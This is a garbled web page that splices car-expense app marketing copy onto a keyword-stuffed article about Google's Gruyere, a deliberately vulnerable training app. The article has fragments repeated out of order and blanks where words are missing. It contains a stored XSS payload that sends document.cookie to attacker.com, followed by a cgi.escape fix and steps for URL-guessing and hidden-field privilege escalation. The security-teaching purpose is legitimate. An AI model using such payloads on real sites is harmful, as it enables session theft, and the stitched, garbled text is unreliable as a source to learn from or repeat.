App Features

FILL-UPS

Record fill-ups for all your cars and monitor your car’s efficiency.

AUTOMATIC MILEAGE RECORDING

Need to track business mileage? Just start auto trip and we will track all your trips in the background whenever you are on the move.

maintenance icon, reparing icon, service icon

SERVICE REMINDERS

Don’t lose sight of your maintenance and services. Log your services and we will remind you when its due.

CONTROL YOUR EXPENSES

Know your vehicle's running costs and plan for your expenses.

SECURE CLOUD BACK-UP

Sign into the cloud and get easy access to all your data from anywhere and any device.

SCHEDULE REPORT

Run your reports or schedule them weekly or monthly to know more about your fill-ups , mileage and expenses.

Gruyere Learn Web Application Exploits Defenses Top

Gruyere’s "Profile settings" – the age field. Step 1: Exploit Input: 35<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> The app saves this to the datastore. Step 2: Consequence Every time an admin views your profile, their admin session cookie is sent to the attacker’s server. The attacker reloads the page as the admin. Step 3: The Fix (Code Level) Replace: self.response.write("<div>Age: %s</div>" % user.age) With: self.response.write("<div>Age: %s</div>" % cgi.escape(user.age))

Enter —a deliberately vulnerable web application designed to teach you how to think like an attacker so you can build defenses like a fortress architect. gruyere learn web application exploits defenses top

If you are searching for a hands-on way to , Gruyere is the top training ground. This article will dissect how to use Gruyere to master common exploits, why it remains the industry’s top teaching tool, and the specific defenses you must implement to stop real-world hackers. Why Gruyere? The "Top" Training Sandbox Explained Gruyere (named after the holey cheese) is an open-source, tiny, yet viciously realistic web application. Unlike capture-the-flag (CTF) platforms that use abstract challenges, Gruyere mimics a real social media snippet application—complete with profiles, snippets, and administrative features. Gruyere’s "Profile settings" – the age field

Attempt the exploit again. Instead of running JavaScript, you literally see the text 35<script>fetch... displayed harmlessly on the page. Conclusion: From Gruyere to Guardian Learning web application security is a cycle of offense and defense. Gruyere remains the top tool because it compresses a decade of security mistakes into a 5-page web app. By spending a weekend with Gruyere, you will move from being a developer who hopes the code is secure to an engineer who knows how to test and break it. The attacker reloads the page as the admin

Navigate to the live "Gruyere" instance. Open your browser’s Developer Tools (F12). Try to delete another user's snippet just by guessing the URL. Try to change your own privilege level to "admin" by editing hidden form fields.

This article serves as a roadmap for developers, security engineers, and students using Google’s Gruyere (now part of the Google Web Security Academy) to understand real-world vulnerabilities, exploit them hands-on, and build robust defenses. In the modern development landscape, security is no longer a "nice-to-have" feature; it is the foundation of trust. Yet, according to OWASP, over 90% of web applications have some form of security misconfiguration or vulnerability. The question is not if your code has a bug, but how fast you can find and fix it.

Enter —a deliberately vulnerable web application designed to teach you how to think like an attacker so you can build defenses like a fortress architect.